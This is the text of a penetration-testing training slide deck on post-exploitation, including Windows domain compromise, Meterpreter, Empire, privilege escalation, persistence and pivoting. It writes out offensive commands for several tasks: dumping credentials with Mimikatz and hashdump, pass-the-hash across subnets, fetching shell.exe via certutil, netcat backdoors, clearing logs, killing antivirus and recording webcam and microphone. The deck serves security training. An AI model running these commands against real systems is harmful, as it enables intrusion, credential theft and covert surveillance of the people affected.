More Related Content Similar to Practical White Hat Hacker Training - Post Exploitation (20) More from PRISMA CSI (12) Practical White Hat Hacker Training - Post Exploitation1. www.prismacsi.com
© All Rights Reserved.
1
Practical White Hat Hacker Training #6
Post Explotation
This document may be quoted or shared, but cannot be modified or used for commercial purposes.
For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr
2. www.prismacsi.com
© All Rights Reserved.
2
Topics
• Domain Exploitation
• Meterpreter
• Crackmapexec
• Empire
• Local Privilege Escalation
• Persistence
• Pivoting
4. www.prismacsi.com
© All Rights Reserved.
4
Domain Exploitation
• To be able to penetrate all systems :
• Vulnerabilities are used to penetrate target systems and user or session information is
gathered.
• Systems can be penetrated thanks to bruteforce attacks.
• An attempt to penetrate additional systems can be done using files containing detailed
information about a given system .
• As a result, the path to Domain Admin opens.
• The control is in your hands!
5. www.prismacsi.com
© All Rights Reserved.
5
Domain Exploitation
• Generally when a windows system is penetrated;
• SAM ve SYSTEM files are accessed.
• %WINDIR%system32configSAM
• %WINDIR%system32configSYSTEM
• Samdump2 is obtained using hashes.
• Or hashdump is run on a metasploit session.
• Obtained hashes are cracked or pass-the-hash method is used to try the hashes through
the entire network.
6. www.prismacsi.com
© All Rights Reserved.
6
Mimikatz - Demo
• Plain text passwords can be obtained with Mimikatz from the memory.
• https://github.com/gentilkiwi/mimikatz
• mimikatz # privilege::debug
• mimikatz # sekurlsa::logonpasswords
7. www.prismacsi.com
© All Rights Reserved.
7
Browser Passwords
• There are several browser modules available on Metasploit.
• run post/windows/gather/enum_chrome
• run post/multi/gather/firefox_creds
• git clone https://github.com/Unode/firefox_decrypt.git
• Nirsoft software can be used
• https://www.nirsoft.net/utils/web_browser_password.html
8. www.prismacsi.com
© All Rights Reserved.
8
MS14-068 Vulnerability
• Allowing access to Domain Admin authority is a critical level vulnerability.
• Kerberos vulnerability
• PyKEK script can be used for a simple exploit. (https://github.com/mubix/pykek )
9. www.prismacsi.com
© All Rights Reserved.
9
Meterpreter
• It’s an advanced payload found in
Metasploit that can be used to manually,
thanks to post exploits, perform a number
of actions quickly.
• Can be though of as Superman.
• Post exploitation is ensuring the admin
privilege is never lost.
10. www.prismacsi.com
© All Rights Reserved.
10
Post Exploitation
• Refers to actions after an exploit.
• Target-specific research techniques
• Steps to obtain password summaries
• Discovering configuration files
• Action of identifying domain users
• Obtaining passwords from the memory
• Inventory extraction
11. www.prismacsi.com
© All Rights Reserved.
11
Post Exploitation - Demo
• Meterpreter Basic Commands
• sysinfo – Used to obtain information about the system
• background – Moves sessions to the background
• getuid – Used to obtain uid information
• upload – Uploads files to the system
• download – Downloads files from the system
12. www.prismacsi.com
© All Rights Reserved.
12
Post Exploitation - Demo
• Meterpreter Basic Commands
• screenshot – Obtains screeshots
• ps – lists running processes
• migrate – Used to move into another running process to maintain persistence
• getsystem – Used for privilege escalation
13. www.prismacsi.com
© All Rights Reserved.
13
Post Exploitation - Demo
• Meterpreter Basic Commands
• Hashdump – obtains hashes of user information
• run hashdump – runs the hashdump post exploit
• record_mic – used to record audio
• webcam_snip 1 – activates a camera on the system if there is any and obtains images.
14. www.prismacsi.com
© All Rights Reserved.
14
Post Exploitation - Demo
• Listening to target system network traffic using Meterpreter.
• use sniffer – executes/runs the sniffer.
• sniffer_interfaces – shows interfaces.
• sniffer_start 3- records packets for interface number 3.
• sniffer_dump 3 /tmp/dump.pcap – Keep the traffic record received for interface 3
15. www.prismacsi.com
© All Rights Reserved.
15
Post Exploitation - Demo
• The other Meterpreter commands
• enum_firefox – Firefox browser is used to draw data if it is installed in the system
• clearev – used to delete logs
• killav – used to shut down antiviruses
• run get_application_list – lists all the applications installed on the system
• run hostedit -e 10.0.1.5,facebook.com – Sir how can I hack facebook accounts? J
• enable_rdp – Used to activate the RDP service.
16. www.prismacsi.com
© All Rights Reserved.
16
Post Exploitation - Demo
• Meterpreter Post Exploit Using
• run post/<TAB>
• use post/windows/gather/enum_domain – Used for domain enumeration.
• run post/windows/gather/enum_applications – discovers applications installed on the system.
• run post/windows/gather/credentials/winscp – Gets the passwords from the winscp application
installed on the system.
17. www.prismacsi.com
© All Rights Reserved.
17
Post Exploitation - Demo
• Commands used for privilege escalation
• getsystem – If there is a way to access the NT AUTHORITY System privileges on the
system, it makes you the most authoritative user by using that way.
• bypass_uac – used to bypass UAC.
18. www.prismacsi.com
© All Rights Reserved.
18
Post Exploitation - Demo
• Meterpreter special modules
• incognito – it is life <3
• use incognito – activates incognito mode
• list_tokens – lists the tokens available on the system
• impersonate_token – allows a user to impersonate the tokens available on the
system
• When you capture the domain admin tokens you can escalate your privileges by using
incognito.
19. www.prismacsi.com
© All Rights Reserved.
19
Post Exploitation
• Empire is a post-exploitation tool that uses PowerShell
and Python.
• Includes flexible and cryptic security structure in modules
to be used on target systems in the post-exploitation
stage.
• If the system uses a security measure such as an anti-
virus, Empire can bypass this because it uses PowerShell.
20. www.prismacsi.com
© All Rights Reserved.
20
Post Exploitation
• Empire has three main features.
• We use these features and the modules they include in the
post-exploitation process.
• They are:
• Listeners
• Stagers
• Agents
21. www.prismacsi.com
© All Rights Reserved.
21
Post Exploitation
• The first thing we can do is start a listener to get the
shell through Empire just like in Metasploit.
• With the listeners command, we enter the listeners
menu and all the active listeners are listed.
• After selecting our listener and adjusting the settings, we
activate the listener with the execute command.
23. www.prismacsi.com
© All Rights Reserved.
23
Post Exploitation
• After starting a listener, the Empire tool contains various
stagers that will send it a connection and enable the
listener to connect to the target system.
• usestager <tab> command lists appropriate stagers and
after selecting one suitable for our purpose and
performing the necessary configurations, the execute
command is used to run it.
26. www.prismacsi.com
© All Rights Reserved.
26
Post Exploitation
• After the listener is started and the stager is run in the
target system, a warning is received from the agents
module on the connection opened.
• agents command is used to navigate to the menu.
• To activate the opened connection,
interact <connection-name> command is used.
28. www.prismacsi.com
© All Rights Reserved.
28
Post Exploitation - CME
• Crackmapexec (CME)
• It is like a Swiss Army Knife
• There are a lot of features available to speed up your network-based attacks.
• With a single command you can execute pass the hash attacks on the whole network and use
the tokens available with mimikatz to perform memory dumps e.tc
29. www.prismacsi.com
© All Rights Reserved.
29
Post Exploitation – CME – Demo
• You can scan the entire network with a username and password.
• crackmapexec smb 10.0.1.0/24 -u Administrator-p Password123!
• You can perform a Pass the Hash attack.
• crackmapexec smb 10.0.1.0/24 -u Administrator -H
E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949
• You can run mimikatz on all the systems that you have successfully penetrated.
• crackmapexec smb 192.168.1.1/24 -u Administrator -p Password123! -M mimikatz
30. www.prismacsi.com
© All Rights Reserved.
30
Post Exploitation – Dfile Transfer
• After penetrating a system, you may not have capable agents like meterpreter at your disposal
to perform file transfer. You can use the following commands to transfer files within the shell
you already own.
• Python 2 :
• Start service: python -m SimpleHTTPServer 8000
• Get with client: wget http://10.0.1.5:8000/file
• Python 3 :
• Start service : python –m http.server 8000
• Get with client : wget http://10.0.1.5:8000/file
31. www.prismacsi.com
© All Rights Reserved.
31
Post Exploitation – File Transfer
• You can also perform file transfer after starting the Apache service on your own machine.
• Caution! You may not be able to get raw content if the programming language is present on the
system (Examole:php)
• Start service: service apache2 start
• Get with the client: wget http://10.0.1.5
• It can also be done with PHP.
• Start service: php -S 0.0.0.0:8000
• Get with the client: wget http://10.0.1.5:8000
32. www.prismacsi.com
© All Rights Reserved.
32
Post Exploitation – File Transfer
• If the system you hacked is Windows?
• You can use bitsadmin.
• bitsadmin /transfer n http://domain/file c:%homepath%file
• You can also use certutil
• certutil.exe -urlcache -split -f "http://10.10.15.76:88/shell.exe"
• You can also transfer files with nc. If nc binary is not present in the target system upload and
run it.
• nc –l 1337 > filename
• nc 10.0.1.6 1337 < filename
• The method of use may vary with the nc version. For example while specifying the port some
versions may also require –p parameter.
• Example: nc –l –p 1337
33. www.prismacsi.com
© All Rights Reserved.
33
Privilege Escalation Attacks
• There are multiple privilege groups on the system.
• For Linux and MacOS root is the user with the highest privileges while for Windows it is the Administrator
user.
• With privilege escalation attacks any user can get access to a privileged user’s credentials.
• Local Exploits!
34. www.prismacsi.com
© All Rights Reserved.
34
Privilege Escalation Attacks
• Why do we need them?
• To read and write on sensitive files in the system
• To maintain persistence on the system
• To seize the system with full privileges
• For advanced monitoring of the system
35. www.prismacsi.com
© All Rights Reserved.
35
Privilege Escalation Attacks
• Linux Privilege Escalation attack types
• Kernel exploits
• Exploitation of services running with root authority
• Exploitation of programs with Suid-bit privileges
• Exploitation of users with sudo rights
• Exploitation of cron-job applications with configuration errors.
36. www.prismacsi.com
© All Rights Reserved.
36
Privilege Escalation Attacks
• Kernel Exploits
• Kernel exploits are programs that allow scripts to be run with elevated privileges by using
vulnerabilities in the Linux kernel (kernel).
• A successful kernel exploit usually allows the user to run commands with super user privileges
(#root).
• For an exploit to work on a target system, there has to be a machine that runs a vulnerable kernel
version and a connection to deploy the exploit on that machine. We also have to be able to execute
the exploit once it is deployed on the target system.
37. www.prismacsi.com
© All Rights Reserved.
37
Privilege Escalation Attacks
• CAUTION!
• Kernel exploits should always be used as a last resort. This is because most of the exloits
found online are not stable and may lead to crashing of the system on which they are run.
The exploits may also leave traces and logs on the target system.
39. www.prismacsi.com
© All Rights Reserved.
39
Privilege Escalation Attacks
• Exploiting services running with root privileges
• Exploiting any service that works with root privileges always results in a root shell. Therefore, you
should always check the services that are running on your system, see if they run with root privilege. If
unnecessary then do not run them with root authority.
41. www.prismacsi.com
© All Rights Reserved.
41
Privilege Escalation Attacks
• SUID Bit Exploit
• SUID (Set User ID) is a Linux feature for running a program with specified user privileges. For
example, the ping command should always work with root privileges to open network sockets.
Therefore, any system on which it is installed automatically has the SUID permission with the
privileges of the root user. In this way each user can use the ping command.
44. www.prismacsi.com
© All Rights Reserved.
44
Privilege Escalation Attacks
• Sudo Privilege Exploitation
• If any sudo user credentials have been accessed then any command can be run with root privileges
by using the user's sudo privileges.
46. www.prismacsi.com
© All Rights Reserved.
46
Privilege Escalation Attacks
• Cronjob Exploit
• If a script or binary can be written as a cron-job, we can obtain root shell by editing the script or
binary.
48. www.prismacsi.com
© All Rights Reserved.
48
Privilege Escalation Attacks
• Recommendations
• First scanning target systems with scripted tools like LinEnum gives us a lot of information about the
system.
• It is a good idea to comprehensively search the target system, as from past experiences, some users
have been known to store credentials in .txt form found in arbitrary folders in the computer.
• In the event that credentials are discovered, a privilege escalation attack attempt may become
needless.
49. www.prismacsi.com
© All Rights Reserved.
49
Privilege Escalation Attacks
• Windows privilege escalation attack types
• Windows Kernel Exploit
• Migration with Meterpreter
• Stored credentials
• Domain Exploitation
51. www.prismacsi.com
© All Rights Reserved.
51
Privilege Escalation Attacks
• Automatically scans the target system to reveal patched vulnerabilities.
53. www.prismacsi.com
© All Rights Reserved.
53
Privilege Escalation Attacks
• With this module, we can capture the hash of the passwords of users in the target system.
54. www.prismacsi.com
© All Rights Reserved.
54
Privilege Escalation Attacks
• With this module, you can escalate your privilege by switching to any process that runs with Administrator
User privileges on the target system.
55. www.prismacsi.com
© All Rights Reserved.
55
Privilege Escalation Attacks
• Privesc_Check Script
• https://github.com/pentestmonkey/windows-privesc-check
56. www.prismacsi.com
© All Rights Reserved.
56
Persistence
• Persistence is a method that ensures a permanent presence in the target system after receiving a shell. This
can be any script or backdoor that has been injected into a running process. The rest is up to a hackers
imagination.
57. www.prismacsi.com
© All Rights Reserved.
57
Persistence
• Technique - Backdoor
• Backdoors are the first and easiest methods that come to mind.
• Many of these can easily be accessed from online information security communities.
• The downside is that backdoors can easily be detected.
58. www.prismacsi.com
© All Rights Reserved.
58
Persistence
• Techniques - Direct Code Injection
• Adding malicious code without damaging already running applications.
• Since a new application is not executed and injection is only performed on an already running
application, detection is almost impossible.
• The downside is that the persistence is lost when the system is rebooted.
59. www.prismacsi.com
© All Rights Reserved.
59
Persistence
• Metasploit – Persistence Module
• After receiving the meterpreter shell on the target system, the run persistence command is executed by
adjusting the necessary settings. In this manner metasploit automatically places a backdoor on the
system. Later on a shell can be retrieved from the specified IP address and port at any time.
61. www.prismacsi.com
© All Rights Reserved.
61
Persistence
• s4u_persistence module
• Creates a scheduled task and the
shell can always be retrieved
thanks to this scheduled task.
62. www.prismacsi.com
© All Rights Reserved.
62
Persistence
• registry_persistence module
• This module creates a payload that runs during boot and embeds it in the system. Thus the system runs
payloads every time the system is rebooted and the shell can be retrieved.
63. www.prismacsi.com
© All Rights Reserved.
63
Persistence
• Netcat Use
• Netcat is a network tool for reading and writing files using TCP / IP protocol. Can be used to maintain
persistence in the target system.
• First the nc.exe file is uploaded to the target system.
64. www.prismacsi.com
© All Rights Reserved.
64
Persistence
• Netcat Use
• The registry value is then set to run nc.exe.
• Firewall rules are added to enable the target system to run nc.exe file and the firewall is
disabled.
66. www.prismacsi.com
© All Rights Reserved.
66
Persistence
• Netcat use
• We now have a backdoor in the system. Using Netcat we can get shell from the target
system whenever we want.
• nc –lvp 10.0.0.55 1337
67. www.prismacsi.com
© All Rights Reserved.
67
Pivoting
• Imagine a corporate structure.
• There is an open server and this server is connected with
other internal systems.
• You have infiltrated this server from the outside and you
want to have access to the internal network as well.
• This is exactly what is referred to as pivoting.
68. www.prismacsi.com
© All Rights Reserved.
68
Pivoting
• You can use tunneling techniques to perform pivoting.
• If the target institution has a proxy server, then you have pivoting resources in your hands.
• SSH tunneling techniques can be used
• Shuttle is the best tool
• A poor man’s vpn over SSH J
• sudo apt-get install sshuttle
• sshuttle -r root@ipaddress 0.0.0.0/0 -vv
69. www.prismacsi.com
© All Rights Reserved.
69
Pivoting with Metasploit
• You can also use the agent meterpreter in Metasploit to perform pivoting.
• You first have to add a routing.
• run autoroute -s network/subnet
• run autoroute –p : you can check the rules you have added.
• You may want to perform port fowarding.
• portfwd add -l 88 -p 80-r ipaddress
• Firefox -> ipaddress:88